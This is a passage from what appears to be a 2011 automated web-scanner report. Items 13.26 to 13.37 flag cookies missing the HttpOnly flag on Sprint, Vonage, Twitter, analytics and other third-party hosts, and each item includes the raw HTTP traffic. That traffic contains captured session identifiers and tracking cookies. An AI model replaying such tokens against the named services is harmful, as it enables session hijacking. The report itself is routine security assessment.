Date: Thu, 12 May 2011 00:50:21 GMT
Content-Length: 1214
Content-Type: text/html
X-Powered-By: Servlet/2.4 JSP/2.0

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
<HTML>
<HEAD>
<TITLE>Error 404--Not Found</TITLE>
<META NAME="GENERATOR" CONTENT="WebLogic Server">
</HEAD>
<BODY bgcolor="white">
<FONT FACE=He
...[SNIP]...

13.26. https://lnp.activationnow.com/lnp/jsp/logon/login.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://lnp.activationnow.com
Path:   /lnp/jsp/logon/login.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lnp/jsp/logon/login.jsp;jsessionid=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413 HTTP/1.1
Host: lnp.activationnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LNP=pabetaptel15p-lnp; JSESSIONID=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413

Response

HTTP/1.1 200 OK
Set-Cookie: LNP=pabetaptel15p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT
Cache-Control: no-store
Date: Thu, 12 May 2011 00:50:20 GMT
Pragma: no-cache
Content-Length: 6277
Content-Type: text/html; charset=ISO-8859-1
Expires: Wed, 31 Dec 1969 23:59:59 GMT
X-Powered-By: Servlet/2.4 JSP/2.0


<html>
<!--
/*
* @(#)login.jsp 5/1/2001 11:55:44 AM
*
* Copyright 2001-2009 Synchronoss Technologies, Inc. 1525 Valley Center Parkway,
* Bethlehem, Pennsylvania, 18017, U.S.A. All Rights R
...[SNIP]...

13.27. http://metrics.connectedplanetonline.com/b/ss/primediateleph/1/H.22.1/s8270624386612

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.connectedplanetonline.com
Path:   /b/ss/primediateleph/1/H.22.1/s8270624386612

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/primediateleph/1/H.22.1/s8270624386612?AQB=1&ndh=1&t=11%2F4%2F2011%2019%3A46%3A54%203%20300&ce=UTF-8&ns=pentonmedia&pageName=bss_oss%3Anews%3APurchase%20from%20Evolving%20Systems%20will%20broaden%20Neustar%20numbering%20solutions%20business&g=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F&cc=USD&ch=bss_oss&events=event18%2Cevent1&c2=connectedplanetonline.com&c6=article&c7=%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2Findex.html&c9=By%20Joan%20Engebretson&c10=Apr%2022%2C%202011%2012%3A42%20PM&c13=Anonymous&c51=did%20not%20bounce&v51=Media%20Visions&c52=Direct%20Traffic&v52=Software%20%26%20Technology%3A%20Electrical%20Components&c53=Direct%20Traffic&v53=10&v54=5065&v55=Birmingham%2C%20AL%20%20%2035210&v56=Not%20Defined&v57=D%3Dch&c58=D%3DpageName&v58=D%3DpageName&v60=D%3DUser-Agent&v61=%2B1&v64=D%3Dc53&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.connectedplanetonline.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: intro=1; s_pers=%20s_visit%3D1%7C1305163014885%3B%20s_depth%3D1%7C1305163014886%3B%20s_dirL%3D1%7C1305163014889%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cm%3DundefinedDirect%2520LoadDirect%2520Load%3B%20gpb_tdt%3DDirect%2520Traffic%3B

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 00:47:45 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E59718851D25A3-60000128800E6F4B[CE]; Expires=Tue, 10 May 2016 00:47:45 GMT; Domain=.connectedplanetonline.com; Path=/
Location: http://metrics.connectedplanetonline.com/b/ss/primediateleph/1/H.22.1/s8270624386612?AQB=1&pccr=true&vidn=26E59718851D25A3-60000128800E6F4B&&ndh=1&t=11%2F4%2F2011%2019%3A46%3A54%203%20300&ce=UTF-8&ns=pentonmedia&pageName=bss_oss%3Anews%3APurchase%20from%20Evolving%20Systems%20will%20broaden%20Neustar%20numbering%20solutions%20business&g=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F&cc=USD&ch=bss_oss&events=event18%2Cevent1&c2=connectedplanetonline.com&c6=article&c7=%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2Findex.html&c9=By%20Joan%20Engebretson&c10=Apr%2022%2C%202011%2012%3A42%20PM&c13=Anonymous&c51=did%20not%20bounce&v51=Media%20Visions&c52=Direct%20Traffic&v52=Software%20%26%20Technology%3A%20Electrical%20Components&c53=Direct%20Traffic&v53=10&v54=5065&v55=Birmingham%2C%20AL%20%20%2035210&v56=Not%20Defined&v57=D%3Dch&c58=D%3DpageName&v58=D%3DpageName&v60=D%3DUser-Agent&v61=%2B1&v64=D%3Dc53&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 00:47:45 GMT
Last-Modified: Fri, 13 May 2011 00:47:45 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www268
Content-Length: 0
Content-Type: text/plain


13.28. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.sprint.com
Path:   /b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294?AQB=1&ndh=1&t=11%2F4%2F2011%2019%3A46%3A22%203%20300&ce=UTF-8&pageName=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&g=http%3A%2F%2Fsupport.sprint.com%2Fsupport%2Farticle%2FBring_your_existing_number_to_Sprint%2Fcase-wh164052-20100420-140547&r=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&cc=USD&ch=Support&server=support.sprint.com&events=event14&h1=Support%7CSU%20%3A%20Services%7CSU%20%3A%20Articles&h2=D%3Dg&c3=Not%20Authenticated&c4=SU%20%3A%20Services&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&c21=case-wh164052-20100420-140547&v29=D%3Dc43&v30=D%3Dch&c40=SU%20%3A%20Articles&c42=Shockwave%20Flash%2010.2%20r154&c43=support.sprint.com&v44=34CE0D747C31107C188BD6527E05D4BF&c45=Support%2BSU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&c46=7%3A30PM&c47=Wednesday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.sprint.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF; TLisset=true; s_cc=true; gpv_p37=Support; gpv_p38=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 00:46:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E596F005010A07-4000010D201AEE12[CE]; Expires=Tue, 10 May 2016 00:46:24 GMT; Domain=.sprint.com; Path=/
Location: http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294?AQB=1&pccr=true&vidn=26E596F005010A07-4000010D201AEE12&&ndh=1&t=11%2F4%2F2011%2019%3A46%3A22%203%20300&ce=UTF-8&pageName=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&g=http%3A%2F%2Fsupport.sprint.com%2Fsupport%2Farticle%2FBring_your_existing_number_to_Sprint%2Fcase-wh164052-20100420-140547&r=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&cc=USD&ch=Support&server=support.sprint.com&events=event14&h1=Support%7CSU%20%3A%20Services%7CSU%20%3A%20Articles&h2=D%3Dg&c3=Not%20Authenticated&c4=SU%20%3A%20Services&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&c21=case-wh164052-20100420-140547&v29=D%3Dc43&v30=D%3Dch&c40=SU%20%3A%20Articles&c42=Shockwave%20Flash%2010.2%20r154&c43=support.sprint.com&v44=34CE0D747C31107C188BD6527E05D4BF&c45=Support%2BSU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&c46=7%3A30PM&c47=Wednesday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 00:46:24 GMT
Last-Modified: Fri, 13 May 2011 00:46:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www105
Content-Length: 0
Content-Type: text/plain


13.29. http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.vonage.com
Path:   /b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139?AQB=1&ndh=1&t=11/4/2011%2019%3A50%3A39%203%20300&ns=vonage&pageName=lp_US_afflpdc_index&g=http%3A//www.vonage.com/lp/US/afflpdc/index.php&r=http%3A//www.vonage-forum.com/forum8.html&cc=USD&ch=US/VDV/Vonagecom&events=event7&h1=US/VDV/Vonagecom&c11=MainSite&v14=http%3A//www.vonage-forum.com/forum8.html&v15=www.vonage-forum.com&v18=Other%20Referrers-www.vonage-forum.com&v19=n/a&v20=Other%20Referrers&v23=Other%20Referrers-www.vonage-forum.com&v44=lp_US_afflpdc_index&c45=3&c46=8%3A30PM&v46=8%3A30PM&c47=Wednesday&v47=Wednesday&c48=Weekday&v48=Weekday&c49=New&v49=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/lp/US/afflpdc/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: refer_id=AFLGN090801001W1; LP=1%7E%7E; op471landingpagegum=a03o0bv0lg275ci0432m078ca; op471landingpageliid=a03o0bv0lg275ci0432m078ca; s_cc=true; s_nr=1305161439053-New; gpv_pageName=lp_US_afflpdc_index; s_cm=undefinedwww.vonage-forum.comwww.vonage-forum.com; s_cpmcvp=%5B%5B%27Other%2520Referrers-www.vonage-forum.com%27%2C%271305161439058%27%5D%5D

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 00:50:40 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E5977005079CA6-60000102A0076E90[CE]; Expires=Tue, 10 May 2016 00:50:40 GMT; Domain=.vonage.com; Path=/
Location: http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139?AQB=1&pccr=true&vidn=26E5977005079CA6-60000102A0076E90&&ndh=1&t=11/4/2011%2019%3A50%3A39%203%20300&ns=vonage&pageName=lp_US_afflpdc_index&g=http%3A//www.vonage.com/lp/US/afflpdc/index.php&r=http%3A//www.vonage-forum.com/forum8.html&cc=USD&ch=US/VDV/Vonagecom&events=event7&h1=US/VDV/Vonagecom&c11=MainSite&v14=http%3A//www.vonage-forum.com/forum8.html&v15=www.vonage-forum.com&v18=Other%20Referrers-www.vonage-forum.com&v19=n/a&v20=Other%20Referrers&v23=Other%20Referrers-www.vonage-forum.com&v44=lp_US_afflpdc_index&c45=3&c46=8%3A30PM&v46=8%3A30PM&c47=Wednesday&v47=Wednesday&c48=Weekday&v48=Weekday&c49=New&v49=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 00:50:40 GMT
Last-Modified: Fri, 13 May 2011 00:50:40 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www21
Content-Length: 0
Content-Type: text/plain


13.30. http://nanpa.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nanpa.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: nanpa.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:05:16 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/
Content-Length: 11874

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...

13.31. http://nextelonline.nextel.com/tl/set_tl.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nextelonline.nextel.com
Path:   /tl/set_tl.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tl/set_tl.html?34CE0D747C31107C188BD6527E05D4BF HTTP/1.1
Host: nextelonline.nextel.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 00:46:16 GMT
Content-type: text/html
Set-Cookie: TLTSID=3E4B9B467C31107C1E2DA15A0F0D7966; Path=/; Domain=.nextel.com
Content-Length: 1439

<script>
   var cn="TLTSID"; // the cookie name
   var flag="TLisset=true"; // name/value for the "flag" cookie
   // array of domains for different environments (production is last as a catchall)
   // each
...[SNIP]...

13.32. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=70613911;fpan=0;fpa=P0-487374334-1303349183888;ns=1;url=http%3A%2F%2Fmediacdn.disqus.com%2F1304984847%2Fbuild%2Fsystem%2Fdef.html%23xdm_e%3Dhttp%253A%252F%252Fconnectedplanetonline.com%26xdm_c%3Ddefault3812%26xdm_p%3D1%26;ref=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1305161240362;tzo=300;a=p-94WKwgUwZHlfo HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://mediacdn.disqus.com/1304984847/build/system/def.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EL4AJe8kjVmM-5GL0ZmY8frRi58oyBABxQEB3AaBtQCa0aWZVw8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAL4tGmog0bEJ0pOUo4sjA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EN8AJe8kjVmM-5GL0ZmY8frRi58oyBABxQEB3QaB1QCa0aWZVw8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAL4tGmog0bEJ0pOUo4sjA; expires=Wed, 10-Aug-2011 00:48:44 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Thu, 12 May 2011 00:48:44 GMT
Server: QS


13.33. http://shop2.sprint.com/en/support/faq/wlnp.shtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop2.sprint.com
Path:   /en/support/faq/wlnp.shtml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/support/faq/wlnp.shtml HTTP/1.1
Host: shop2.sprint.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 12 May 2011 00:46:00 GMT
Set-Cookie: TLTSID=34E27AE87C31107C188CD6527E05D4BF; Path=/; Domain=.sprint.com
Content-type: text/html
Content-Length: 324

<script type="text/javascript">location.replace('http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547');</script>


<meta http-equiv="refresh" c
...[SNIP]...

13.34. http://tis.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tis.org
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: tis.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:43:06 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: COOKIE=10.5.16.243.1305160986882003; path=/
Set-Cookie: referrer=; path=/
Set-Cookie: t=cd7bec407c3011e0b0290015c5e75168; path=/
Set-Cookie: referrer=tis.org; path=/
Set-Cookie: visitorxtis.org=1
Set-Cookie: Template--tis.org=3D_Bars; path=/
Set-Cookie: FeedProvider--tis.org=Google; path=/
Vary: Accept-Encoding,User-Agent
Cartoon: aalander6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29687


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html>
<head>

<title>

tis.org


</tit
...[SNIP]...

13.35. http://twitter.com/javascripts/blogger.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /javascripts/blogger.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /javascripts/blogger.js HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://www.secviz.org/node/89
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1304617828.1304721594.4
If-Modified-Since: Wed, 04 May 2011 17:32:26 GMT

Response

HTTP/1.1 304 Not Modified
Date: Thu, 12 May 2011 00:48:47 GMT
Server: Apache
Connection: close
Expires: Thu, 12 May 2011 00:53:47 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: k=173.193.214.243.1305161327058682; path=/; expires=Thu, 19-May-11 00:48:47 GMT; domain=.twitter.com


13.36. http://twitter.com/statuses/user_timeline/secviz.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /statuses/user_timeline/secviz.json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /statuses/user_timeline/secviz.json?callback=twitterCallback2&count=5 HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://www.secviz.org/node/89
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1304617828.1304721594.4

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:49:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305161343-28574-3094
X-RateLimit-Limit: 150
ETag: "9c18d6e3de016bac59085e3c74723530"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Thu, 12 May 2011 00:49:03 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.04405
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef11477ab40b6
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 48c6b00eb172eca08292fefc3f9a44aa803a0bea
X-RateLimit-Reset: 1305164927
Set-Cookie: k=173.193.214.243.1305161343071359; path=/; expires=Thu, 19-May-11 00:49:03 GMT; domain=.twitter.com
Set-Cookie: original_referer=ZLhHHTiegr8kpyX5k%2BwrH7KWx%2F5%2BVN6GIeAi2OckkTU%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCMagreEvAToHaWQiJTFlNzc0MGNjZDE5YWRh%250ANmViZDk3ZWZmMTgxMzUwYjRiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--9e2ecb2bd74b01132ec8ea6647ea1b3428d0ca0f; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Length: 6953

twitterCallback2([{"text":"RT @pcapr Visualizing application flows: http:\/\/bit.ly\/kSappw","coordinates":null,"truncated":false,"id_str":"64004740723392512","source":"\u003Ca href=\"http:\/\/seesmic
...[SNIP]...

13.37. http://www.nanpa.org/forums/external.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nanpa.org
Path:   /forums/external.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/external.php?type=js HTTP/1.1
Host: www.nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/recent_forum_posts.php
